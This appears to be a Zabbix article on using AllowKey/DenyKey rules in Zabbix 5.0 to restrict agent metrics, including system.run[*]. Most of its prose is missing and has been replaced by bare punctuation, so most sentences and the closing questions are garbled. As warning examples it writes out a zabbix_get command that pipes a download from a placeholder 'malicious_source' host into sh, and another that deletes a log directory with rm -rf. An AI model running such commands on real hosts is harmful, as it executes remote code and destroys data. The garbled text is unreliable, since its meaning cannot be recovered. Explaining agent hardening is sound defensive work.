Support for black and white lists for metrics on the agent side
Tikhon Uskov, Integration Engineer, Zabbix
Data security concerns
Zabbix 5.0 introduces a new feature that improves security on systems using Zabbix Agent and replaces the old EnableRemoteCommands parameter.
, zabbix_get , , . .
zabbix_get
. , . , , /etc/passwd/ .
- . , system.run[*] , - Zabbix , .
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]
- Linux root-, Windows System . , Zabbix Agent , , WMI .
EnableRemoteCommands=0 system.run[*] -, , , , .
EnableRemoteCommands Zabbix
AllowKey/DenyKey
Zabbix 5.0 .
Zabbix 5.0 , system.run[*], , :
AllowKey= - ;
DenyKey= - ;
, (*).
AllowKey DenyKey . AllowKey/DenyKey . , - , .
2 vfs.file.size[/tmp/file]
AllowKey/DenyKey:
2 system.run[*], , , , .
(wildcard). (*) . , . , , wildcard.
[].
system.run[*
vfs.file*.txt]
vfs.file.*[*]
wildcard.
- , wildcard, , . . .
- , , . , CPU , system.cpu.load[*] , , .
- , , (discovery) . AllowKey/DenyKey :
- HostnameItem
- HostMetadataItem
- HostInterfaceItem
. - , Zabbix , 'NOTSUPPORTED'. log- . , , - .
- Zabbix.
- zabbix_agentd. Zabbix agent with --print (-p) ( ), , . --test (-t) 'Unsupported item key'.
- zabbix_get. zabbix_get -k 'ZBX_NOTSUPPORTED: Unknown metric'.
, , zabbix_get, .
. , ? , , , Zabbix?
. regex, , , , . Regex - , . Wildcards - , .
. Include ?
. , , , . AllowKey/DenyKey Include, , .
. Zabbix 5.0 'EnableRemoteCommands=' , AllowKey/DenyKey?